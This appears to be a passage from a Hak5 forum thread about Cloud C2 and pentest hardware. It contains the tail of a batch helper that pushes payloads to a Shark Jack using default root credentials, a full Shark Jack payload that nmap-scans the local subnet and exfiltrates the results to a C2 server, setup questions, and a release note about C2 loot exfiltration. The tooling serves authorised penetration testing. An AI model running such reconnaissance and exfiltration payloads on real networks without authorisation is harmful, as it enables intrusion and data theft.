          scp %CD%\payload_C2_Internet_Tester.sh root@%SHARK_IP%:/root/payload/payload.sh
          echo.
          echo Finished. Returning to SharkHelper Menu.
          pause
          GOTO SHARKHELPER_MENU

          :INSTALL_C2_CONFIG
          cls
          IF NOT EXIST "%CD%\device.config" (
              echo.
              echo Please make sure to put your 'device.config' file in:
              echo -^> %CD%
              echo.
              echo.
              pause
              GOTO SHARKHELPER_MENU
          )
          IF EXIST "%CD%\device.config" (
              echo.
              echo Continuing.. device.config file found.
              echo.
              echo.
              echo Pushing device.config to SharkJack at %SHARK_IP%
              echo Connecting to the SharkJack..
              echo.
              echo (Input password: hak5shark OR Password you have already set.)
              scp %CD%\device.config root@%SHARK_IP%:/etc/device.config
              echo.
              echo Finished. Returning to SharkHelper Menu.
              pause
              GOTO SHARKHELPER_MENU
          )

          :VIEW_PAYLOAD
          cls
          echo Connecting to the SharkJack with default credentials. (root:hak5shark)
          echo.
          echo.
          echo (Input password: hak5shark OR Password you have already set.)
          echo.
          ssh root@%SHARK_IP% "cat /root/payload/payload.sh;exit"
          echo.
          pause
          GOTO SHARKHELPER_MENU

          :EOF
          echo Cleaning Up..
          IF EXIST "%CD%\payload_C2_Internet_Tester.sh" del /f %CD%\payload_C2_Internet_Tester.sh
          IF EXIST "%CD%\payload_Internet_Tester.sh" del /f %CD%\payload_Internet_Tester.sh
          IF EXIST "%CD%\payload_default.sh" del /f %CD%\payload_default.sh
          IF EXIST "%CD%\sharklib.sh" del /f %CD%\sharklib.sh
          EXIT /B
  19. Hey y'all, just wanted to share my slightly modified nmap scan payload. It scans a bunch of ports, saves the output with a date stamp and multiple output types, and then uploads the loot to the C2 server.

      #!/bin/bash
      #
      # Title:         Custom Nmap Payload for Shark Jack
      # Author:        Flatlinebb
      # Version:       1.02
      #
      # Scans target subnet with Nmap using specified options. Saves each scan result
      # to loot storage folder. Uploads loot to your C2 server
      #
      # Red ...........Setup
      # Amber..........Scanning
      # Green..........Finished
      #
      # See nmap --help for options. Default "-sP" ping scans the address space for
      # fast host discovery.

      NMAP_OPTIONS="-p 21,22,23,53,69,80,123,139,443,445,554,1812,3389,5220,2022,4242,4343,5000,5650,5655,5670,5800,5900,8080,8333,8222,8765,8008,8009,8181,8282,8383,8484,8888,8443,9000,10000,32400,32401,32402,49153 --open"
      LOOT_DIR=/root/loot/nmap
      SCAN_DIR=/etc/shark/nmap

      function finish() {
          LED CLEANUP
          # Kill Nmap
          echo $1
          wait $1
          kill $1 &> /dev/null
          # Exfiltrate all loot files
          FILES="$LOOT_DIR/*.*"
          for f in $FILES; do C2EXFIL STRING $f $SUBNET; done
          # Sync filesystem
          echo $SCAN_M > $SCAN_FILE
          sync
          sleep 1
          LED FINISH
          sleep 1
          # Halt system
          halt
      }

      function setup() {
          LED SETUP
          # Create loot directory
          mkdir -p $LOOT_DIR &> /dev/null
          # Set NETMODE to DHCP_CLIENT for Shark Jack v1.1.0+
          NETMODE DHCP_CLIENT
          # Wait for an IP address to be obtained
          while ! ifconfig eth0 | grep "inet addr"; do sleep 1; done
          # Create tmp scan directory
          mkdir -p $SCAN_DIR &> /dev/null
          # Create tmp scan file if it doesn't exist
          SCAN_FILE=$SCAN_DIR/scan-count
          if [ ! -f $SCAN_FILE ]; then
              touch $SCAN_FILE && echo 0 > $SCAN_FILE
          fi
          # Find IP address and subnet
          while [ -z "$SUBNET" ]; do
              sleep 1 && find_subnet
          done
      }

      function find_subnet() {
          SUBNET=$(ip addr | grep -i eth0 | grep -i inet | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}[\/]{1}[0-9]{1,2}" | sed 's/\.[0-9]*\//\.0\//')
      }

      function run() {
          # Run setup
          setup
          SCAN_N=$(cat $SCAN_FILE)
          SCAN_M=$(( $SCAN_N + 1 ))
          LED ATTACK
          # Connect to Cloud C2
          C2CONNECT
          # Wait until Cloud C2 connection is established
          while ! pgrep cc-client; do sleep 1; done
          # Start scan
          # Braces keep the trailing underscore out of the variable name; a bare
          # $SCAN_M_ would expand the unset variable SCAN_M_ and drop the scan count
          nmap $NMAP_OPTIONS $SUBNET -oA $LOOT_DIR/nmap-scan_${SCAN_M}_$(date +"%Y-%m-%d_%H%M%S") &>/dev/null &
          tpid=$!
          sleep 1
          finish $tpid
      }

      # Run payload
      run &

      Obligatory github link: https://github.com/flatlinebb/sharkjack-payloads/blob/master/payloads/library/recon/Custom nmap payload/payload.sh
  20. I'm trying to test a few things with a self-hosted C2 and a Tetra on the same LAN. Since I want it set up to work both internally and externally via a host name, I set up an A record on my internal DNS so that the external DNS name will resolve to the internal IP while on the same LAN. The issue is getting the Tetra to look to my DNS server automatically. I'm currently using eth0 (wired) for my network connection. What I would like is for the Tetra to get its DNS information from the same DHCP server that is handing out its IP address. I have tried removing the "Option DNS 8.8.8.8, 8.8.4.4" from /etc/config/network under both WAN (eth0) and WWAN with no luck. I know that I can edit the /etc/resolve.conf file (currently pointed to 127.0.01) or add a static entry to /etc/hosts (which I have done to get things working internally for now), but I'm looking for a means to do this via the DHCP-issued DNS servers so that it will resolve the host name both internally and externally based on the network that it is connected to. Any suggestions?
  21. Hi, I'm currently playing around with the Signal Owl. I'm trying to include it in my C2 instance, which doesn't work. The Signal Owl is connecting to my open WLAN but it looks like it isn't connecting. I copied the device.config to the /etc/ directory to configure the C2 server. This worked on the Pineapple before. Anyone experience the same issues? The C2 server is running on TCP 443 with SSL (letsencrypt).

      BusyBox v1.30.1 () built-in shell (ash)

       .___.
       {o,o}
       /)__)       Hak5 Signal Owl
       " "         Version 1.0.1
      =======================================
      Built on OpenWRT 19.07
      =======================================
  22. I have managed to make the Screen Crab take screenshots successfully, but can't get it to connect to the WiFi/C2 server. I've tried many forms of the config.txt file in order for it to work (of course, I've also placed the device.config in the SD root). Can anybody please upload a sample config.txt file including a pseudo SSID and password?
  23. Hi, The first 10 months of feedback has been incredible, and we are excited to bring you some epic new features and enhancements to the platform with Cloud C2 version 2.0.0! This release adds support for the latest Hak5 devices, including the Screen Crab, Signal Owl and Shark Jack. It also features a protocol enhancement that reduces network overhead and bandwidth for deployed devices. This release includes a LOOT feature, allowing you to easily exfiltrate any arbitrary data from the target network using the C2 protocol. Accessible from the new Loot menu within each device type, the Loot view allows you to sort, view and export collected files. An accompanying C2EXFIL command for all Cloud C2 enabled devices can be used in your modules and payloads to send files up to the server. With this release, all deployed devices will need to be updated to their latest firmware versions, so be mindful when updating if you have devices deployed in the field. As always, thank you for your feedback, and feel free to join the discussion within the Hak5 community.